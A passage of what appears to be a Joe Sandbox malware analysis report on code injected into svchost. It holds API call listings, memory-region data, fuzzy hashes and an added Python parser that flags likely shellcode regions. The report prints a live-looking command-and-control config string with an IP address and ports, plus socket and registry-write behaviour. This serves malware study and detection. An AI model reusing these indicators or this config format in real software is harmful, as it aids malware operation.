                                                                                                                • Part of subcall function 02586F29: RtlFreeHeap.NTDLL(00000000,00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253), ref: 02586F3F
                                                                                                                • Part of subcall function 02586F29: GetLastError.KERNEL32(00000000,?,0258996C,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C,0258C253,00000000), ref: 02586F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 55202a1864c298acf64af94d508e21876712d147056cd834cebc1a2d96f5e08b
                                                                                                              • Instruction ID: b6029f7d61fe94fb0e1fe7e34b63a950a4d26c40ff71ec8c6e5ec5c1f6cfa8bc
                                                                                                              • Opcode Fuzzy Hash: 55202a1864c298acf64af94d508e21876712d147056cd834cebc1a2d96f5e08b
                                                                                                              • Instruction Fuzzy Hash: 9A515DB2A00511DFD714EF59D180855BBA6BF8931871AC4ADC50EAB311CBB2ED43CF95
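Every per-function record in this listing has the same shape (APIs, optional Strings, Memory Dump Source, Joe Sandbox IDA Plugin, optional Yara matches, Similarity with the API/opcode IDs and fuzzy hashes), so the section can be parsed mechanically instead of read by eye. The Python below is an added example, not Joe Sandbox code: it parses a two-record excerpt copied from this listing (one record from the 02580000 image, one from the 04C70000 region), decodes the .sdmp file name and groups functions by memory region. The field layout it assumes for the .sdmp name is pid index, phase, dump id, base address, page protection, allocation state, allocation type, reserved; that layout is an assumption, while the Windows constants it decodes (0x40 PAGE_EXECUTE_READWRITE, 0x1000 MEM_COMMIT, 0x20000 MEM_PRIVATE) are not. Under that reading every region in this section is a committed private RWX allocation inside svchost, and the two regions reported with "based on PE: false" (04C70000 and 02A00000) carry no PE header, which is the shape of raw injected code rather than a mapped module; the summary flags exactly those.

```python
"""Parse Joe Sandbox per-function records into structured data (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Windows memory constants from winnt.h (these values are certain).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout of the .sdmp name: pid-index.phase.dump-id.base.protect.state.type.reserved
SDMP_RE = re.compile(
    r"(?P<pid>\d{8})\.(?P<phase>\d{8})\.(?P<dump>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})"
    r"\.[0-9A-Fa-f]{8}\.sdmp"
)
SOURCE_RE = re.compile(r"(?P<name>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class Region:
    pid: int
    phase: int
    base: int
    protect: str
    state: str
    mem_type: str
    pe_backed: bool


@dataclass
class FunctionRecord:
    apis: List[dict] = field(default_factory=list)      # name, module, args, ref, parent (subcall) per call
    region: Optional[Region] = None
    yara: bool = False
    fields: Dict[str, str] = field(default_factory=dict)  # API ID, String ID, Opcode ID, fuzzy hashes, ...


def parse_region(value: str) -> Region:
    """Decode '<name>.sdmp, Offset: ..., based on PE: ...' using the assumed field layout above."""
    src = SOURCE_RE.match(value)
    f = SDMP_RE.fullmatch(src["name"])
    protect, state, mtype = (int(f[k], 16) for k in ("protect", "state", "type"))
    return Region(pid=int(f["pid"]), phase=int(f["phase"]), base=int(f["base"], 16),
                  protect=PAGE_PROTECT.get(protect, hex(protect)),
                  state=MEM_STATE.get(state, hex(state)),
                  mem_type=MEM_TYPE.get(mtype, hex(mtype)),
                  pe_backed=src["pe"] == "true")


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function; a record is complete at its 'Instruction Fuzzy Hash' line.
    A trailing record cut off before that line (as at a page break) is dropped, not guessed."""
    records: List[FunctionRecord] = []
    cur, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if line == "Yara matches":
            cur.yara = True
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(m.groupdict())
                continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, value = m["key"], m["value"]
        if key == "Source File":
            cur.region = parse_region(value)
        else:
            cur.fields[key] = value.replace("Download File", "")  # strip the report's link residue
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur, section = FunctionRecord(), None
    return records


def summarize(records: List[FunctionRecord]) -> Dict[int, dict]:
    """Group records by region. A private RWX region with no PE header is the shape of raw injected code."""
    out: Dict[int, dict] = {}
    for rec in records:
        reg = rec.region
        if reg is None:
            continue
        entry = out.setdefault(reg.base, {
            "protect": reg.protect, "state": reg.state, "type": reg.mem_type, "pe_backed": reg.pe_backed,
            "functions": 0, "yara": False, "apis": set(),
            "shellcode_like": (reg.protect == "PAGE_EXECUTE_READWRITE"
                               and reg.mem_type == "MEM_PRIVATE" and not reg.pe_backed),
        })
        entry["functions"] += 1
        entry["yara"] = entry["yara"] or rec.yara
        entry["apis"].update(a["name"] for a in rec.apis)
    return out


# Two records copied from this listing (trimmed), including one 'Download File' residue line.
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 02583F55
• SetLastError.KERNEL32(0000139F,?,7591DFA0,02583628), ref: 02584044
  • Part of subcall function 02582B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02582B96
• send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
• shutdown.WS2_32(?,00000001), ref: 0258400B
• closesocket.WS2_32(?), ref: 02584015
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
• String ID:
• API String ID: 3254528666-0
• Opcode ID: 29fdf06e1f57ab692066b2476fa0b4e58cef4e9809d1b28e281565a229cc9e35
• Instruction ID: c7111e9278732811f32339d83cc865008d8bc84c55e8238c004bd6be83e33f93
• Opcode Fuzzy Hash: 29fdf06e1f57ab692066b2476fa0b4e58cef4e9809d1b28e281565a229cc9e35
• Instruction Fuzzy Hash: 29217C702407019BD330AF64D888B6BBBF9FF44714F500D1DE682AA680D7B9E469DB98
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
Yara matches
Similarity
• API ID: _memset$_malloc
• String ID: ($6$gfff$gfff
• API String ID: 3506388080-713438465
• Opcode ID: 14e950ddf0dccbf98cbf7d550d4d5d320185db8f8e9866791adc7453f3865733
• Instruction ID: feac29e046e93d51c25550d2bdee0a295dbb905e9ebb764e402aad54b292e7da
• Opcode Fuzzy Hash: 14e950ddf0dccbf98cbf7d550d4d5d320185db8f8e9866791adc7453f3865733
• Instruction Fuzzy Hash: 88D15DB1E01318AFEB10EFA9DC85A9EBBBAFF44304F104529E505A7251E774AD05CB61
"""

if __name__ == "__main__":
    for base, info in sorted(summarize(parse_records(SAMPLE)).items()):
        print(f"{base:08X} {info['protect']} {info['type']} pe={info['pe_backed']} "
              f"yara={info['yara']} funcs={info['functions']} shellcode_like={info['shellcode_like']}")
```

Run against the whole section rather than the excerpt, the grouped API sets give a quick capability view per region (sockets and events at 02580000, CRT heap helpers in the unbacked regions), and the fuzzy hashes in each record's fields can be compared across reports to relate this build to other samples.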
APIs
• GetCurrentThreadId.KERNEL32 ref: 02583863
• SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 025838A4
• WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02583911
• GetCurrentThreadId.KERNEL32 ref: 0258393C
• GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 025839D4
• SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02583A02
• WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02583A19
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
• String ID:
• API String ID: 3058130114-0
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,02597B80,00000008,02589956,00000000,00000000,?,0258A030,00000000,00000001,00000000,?,0258C1C3,00000018,02597BF0,0000000C), ref: 0258985F
• __lock.LIBCMT ref: 02589893
  • Part of subcall function 0258C238: __mtinitlocknum.LIBCMT ref: 0258C24E
  • Part of subcall function 0258C238: __amsg_exit.LIBCMT ref: 0258C25A
  • Part of subcall function 0258C238: EnterCriticalSection.KERNEL32(00000000,00000000,?,02589A26,0000000D,02597BA8,00000008,02589B1D,00000000,?,025877F1,00000000,02597AE0,00000008,02587856,?), ref: 0258C262
• InterlockedIncrement.KERNEL32(?), ref: 025898A0
• __lock.LIBCMT ref: 025898B4
• ___addlocaleref.LIBCMT ref: 025898D2
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: KERNEL32.DLL
• API String ID: 637971194-2576044830
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,04E17338,00000008,04E03E86,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C), ref: 04E03D8F
• __lock.LIBCMT ref: 04E03DC3
  • Part of subcall function 04E08EAB: __mtinitlocknum.LIBCMT ref: 04E08EC1
  • Part of subcall function 04E08EAB: __amsg_exit.LIBCMT ref: 04E08ECD
  • Part of subcall function 04E08EAB: EnterCriticalSection.KERNEL32(00000000,00000000,?,04E03F56,0000000D,04E17360,00000008,04E0404D,00000000,?,04E01140,00000000,04E17298,00000008,04E011A5,?), ref: 04E08ED5
• InterlockedIncrement.KERNEL32(?), ref: 04E03DD0
• __lock.LIBCMT ref: 04E03DE4
• ___addlocaleref.LIBCMT ref: 04E03E02
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: KERNEL32.DLL
• API String ID: 637971194-2576044830
APIs
• RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 04DFB7F7
• RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 04DFB807
• RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 04DFB81E
• RegCloseKey.ADVAPI32(?,?,00000004), ref: 04DFB829
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: Value$CloseDeleteOpen
• String ID: Console$IpDatespecial
• API String ID: 3183427449-1840232981
APIs
• __getptd.LIBCMT ref: 02593502
  • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
  • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
• __getptd.LIBCMT ref: 02593513
• __getptd.LIBCMT ref: 02593521
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: MOC$RCC$csm
• API String ID: 803148776-2671469338
APIs
• _malloc.LIBCMT ref: 04DF9C8F
  • Part of subcall function 04DFF6C3: __FF_MSGBANNER.LIBCMT ref: 04DFF6DC
  • Part of subcall function 04DFF6C3: __NMSG_WRITE.LIBCMT ref: 04DFF6E3
  • Part of subcall function 04DFF6C3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF708
• _free.LIBCMT ref: 04DF9CB3
• _memset.LIBCMT ref: 04DF9D0B
  • Part of subcall function 04DFA660: GetObjectW.GDI32(?,00000054,?), ref: 04DFA67E
• CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 04DF9D23
• _free.LIBCMT ref: 04DF9D34
• _free.LIBCMT ref: 04DF9D73
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
• String ID:
• API String ID: 1756752955-0
APIs
• EnterCriticalSection.KERNEL32(000002FF), ref: 025850AA
• WSASetLastError.WS2_32(0000139F), ref: 025850C2
• LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 025850CC
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeave
• String ID:
• API String ID: 4082018349-0
APIs
• __CreateFrameInfo.LIBCMT ref: 025937BB
  • Part of subcall function 0259334B: __getptd.LIBCMT ref: 02593359
  • Part of subcall function 0259334B: __getptd.LIBCMT ref: 02593367
• __getptd.LIBCMT ref: 025937C5
  • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
  • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
• __getptd.LIBCMT ref: 025937D3
• __getptd.LIBCMT ref: 025937E1
• __getptd.LIBCMT ref: 025937EC
• _CallCatchBlock2.LIBCMT ref: 02593812
  • Part of subcall function 025933F0: __CallSettingFrame@12.LIBCMT ref: 0259343C
  • Part of subcall function 025938B9: __getptd.LIBCMT ref: 025938C8
  • Part of subcall function 025938B9: __getptd.LIBCMT ref: 025938D6
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
• String ID:
• API String ID: 1602911419-0
                                                                                                              APIs
                                                                                                              • __CreateFrameInfo.LIBCMT ref: 04E11636
                                                                                                                • Part of subcall function 04E11115: __getptd.LIBCMT ref: 04E11123
                                                                                                                • Part of subcall function 04E11115: __getptd.LIBCMT ref: 04E11131
                                                                                                              • __getptd.LIBCMT ref: 04E11640
                                                                                                                • Part of subcall function 04E03EAB: __getptd_noexit.LIBCMT ref: 04E03EAE
                                                                                                                • Part of subcall function 04E03EAB: __amsg_exit.LIBCMT ref: 04E03EBB
                                                                                                              • __getptd.LIBCMT ref: 04E1164E
                                                                                                              • __getptd.LIBCMT ref: 04E1165C
                                                                                                              • __getptd.LIBCMT ref: 04E11667
                                                                                                              • _CallCatchBlock2.LIBCMT ref: 04E1168D
                                                                                                                • Part of subcall function 04E111BA: __CallSettingFrame@12.LIBCMT ref: 04E11206
                                                                                                                • Part of subcall function 04E11734: __getptd.LIBCMT ref: 04E11743
                                                                                                                • Part of subcall function 04E11734: __getptd.LIBCMT ref: 04E11751
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 1602911419-0
                                                                                                              • Opcode ID: 5415e2a2aca42f49521902f94d57b1e19e85c66b3c9f03acc961ff31fc819dfc
                                                                                                              • Instruction ID: 96d495dea35c33ebb192c55a585b59d04d9f9d60841388276a5905bbba8c6ad2
                                                                                                              • Opcode Fuzzy Hash: 5415e2a2aca42f49521902f94d57b1e19e85c66b3c9f03acc961ff31fc819dfc
                                                                                                              • Instruction Fuzzy Hash: BA112B71D10309DFEF00EFA4C484AEDBBB0FF08314F109169E925AB290DB38AA529F50
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 0258DABA
                                                                                                                • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
                                                                                                                • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
                                                                                                              • __amsg_exit.LIBCMT ref: 0258DADA
                                                                                                              • __lock.LIBCMT ref: 0258DAEA
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0258DB07
                                                                                                              • _free.LIBCMT ref: 0258DB1A
                                                                                                              • InterlockedIncrement.KERNEL32(044020D0), ref: 0258DB32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3470314060-0
                                                                                                              • Opcode ID: 32efcaeaa2538315f21ba601a9a3614d5da4f02895c9b022eb760184ecd35938
                                                                                                              • Instruction ID: 43cb6adb4ce8ceb30295bb595125937eb2870b1527163693bd773d72a8c8cef8
                                                                                                              • Opcode Fuzzy Hash: 32efcaeaa2538315f21ba601a9a3614d5da4f02895c9b022eb760184ecd35938
                                                                                                              • Instruction Fuzzy Hash: 56017932D466129BDB15BF759444B6DBBB2BB44721F110009E800B72C0CBB4A951DFDD
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025848D1
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025848DC
                                                                                                              • Sleep.KERNEL32(00000258), ref: 025848E9
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02584904
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258490D
                                                                                                              • Sleep.KERNEL32(0000012C), ref: 0258491E
                                                                                                                • Part of subcall function 02583F50: GetCurrentThreadId.KERNEL32 ref: 02583F55
                                                                                                                • Part of subcall function 02583F50: send.WS2_32(?,02597420,00000010,00000000), ref: 02583FB6
                                                                                                                • Part of subcall function 02583F50: SetEvent.KERNEL32(?), ref: 02583FD9
                                                                                                                • Part of subcall function 02583F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02583FE5
                                                                                                                • Part of subcall function 02583F50: WSACloseEvent.WS2_32(?), ref: 02583FF3
                                                                                                                • Part of subcall function 02583F50: shutdown.WS2_32(?,00000001), ref: 0258400B
                                                                                                                • Part of subcall function 02583F50: closesocket.WS2_32(?), ref: 02584015
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                              • String ID:
                                                                                                              • API String ID: 1019945655-0
                                                                                                              • Opcode ID: 5d5e0888ca6033fde68e7120744e4a50b9f8ddf3ac55a463301e0aec675f75a6
                                                                                                              • Instruction ID: 483c6f8635ad2378df9ad403dfe39a1b93b46ac88e989689b3846310ad1502bb
                                                                                                              • Opcode Fuzzy Hash: 5d5e0888ca6033fde68e7120744e4a50b9f8ddf3ac55a463301e0aec675f75a6
                                                                                                              • Instruction Fuzzy Hash: 8CF030766047019BC620EBA9DC84D5AF3E9EFC9720B114B09E26997290CAB4E8158BA4
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_vswprintf_s
                                                                                                              • String ID: D
                                                                                                              • API String ID: 3424173483-2746444292
                                                                                                              • Opcode ID: db93658889c9cac5b66fb2864cdc776cd0bb09df6381925f380574511ea077d7
                                                                                                              • Instruction ID: b60fab656e2ab45d6cd3310dde0ea8a1048563f64878172bb43e0458265c3d7d
                                                                                                              • Opcode Fuzzy Hash: db93658889c9cac5b66fb2864cdc776cd0bb09df6381925f380574511ea077d7
                                                                                                              • Instruction Fuzzy Hash: 6481AA71A40218BBE731DB659C89FEB777DEF99704F104098F708A6181DBB0AB858F64
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(000012A0,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D78
                                                                                                              • _memset.LIBCMT ref: 02585D82
                                                                                                              • lstrlenW.KERNEL32(|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D8F
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,02585E77,p1:,0259C6FE,00000000,0259C6E0,00000000,000012A0,|p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:), ref: 02585D97
                                                                                                              Strings
                                                                                                              • |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:, xrefs: 02585D8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$_memset
                                                                                                              • String ID: |p1:47.239.116.158|o1:6666|t1:1|p2:47.239.116.158|o2:8888|t2:1|p3:127.0.0.1|o3:80|t3:1|dd:1|cl:1|fz:
                                                                                                              • API String ID: 2425037729-42098077
                                                                                                              • Opcode ID: 98136556b0ccc42f9ce8a65fe3c9cdf857bed3e65ed316bf608c521e7328d48c
                                                                                                              • Instruction ID: 1fa27fcd51bb6852c8fac1aebe43c6565463c212785e93a61d50db746ae33591
                                                                                                              • Opcode Fuzzy Hash: 98136556b0ccc42f9ce8a65fe3c9cdf857bed3e65ed316bf608c521e7328d48c
                                                                                                              • Instruction Fuzzy Hash: A2214C73F011256BCF247F15EC406AE7399FB84720B970069DC04E7200F7B15E5186E4
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 02A13520
                                                                                                                • Part of subcall function 02A1347B: ___BuildCatchObjectHelper.LIBCMT ref: 02A134B1
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 02A13537
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 02A13545
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm$csm
                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                              • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction ID: 7aebf08c7ee2057fc9416ea7b58e37095f974ce99f3a4b035681884a6f4915a5
                                                                                                              • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                              • Instruction Fuzzy Hash: 93014671040119BFDF22AF51CD40EEA7F6AEF08364F008090BD5814160DB32D9B1DFA4
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 04C9138D
                                                                                                                • Part of subcall function 04C912E8: ___BuildCatchObjectHelper.LIBCMT ref: 04C9131E
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 04C913A4
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 04C913B2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm$csm
                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                              • Opcode ID: acebe2f2dd98b05ece9ef9f4cf680833d2c7afe621d7ef915d180bda475f8e40
                                                                                                              • Instruction ID: e14527ec2469a0c4940f90bd734088572ad53b3b0309ba3637cb6b2dfb32059f
                                                                                                              • Opcode Fuzzy Hash: acebe2f2dd98b05ece9ef9f4cf680833d2c7afe621d7ef915d180bda475f8e40
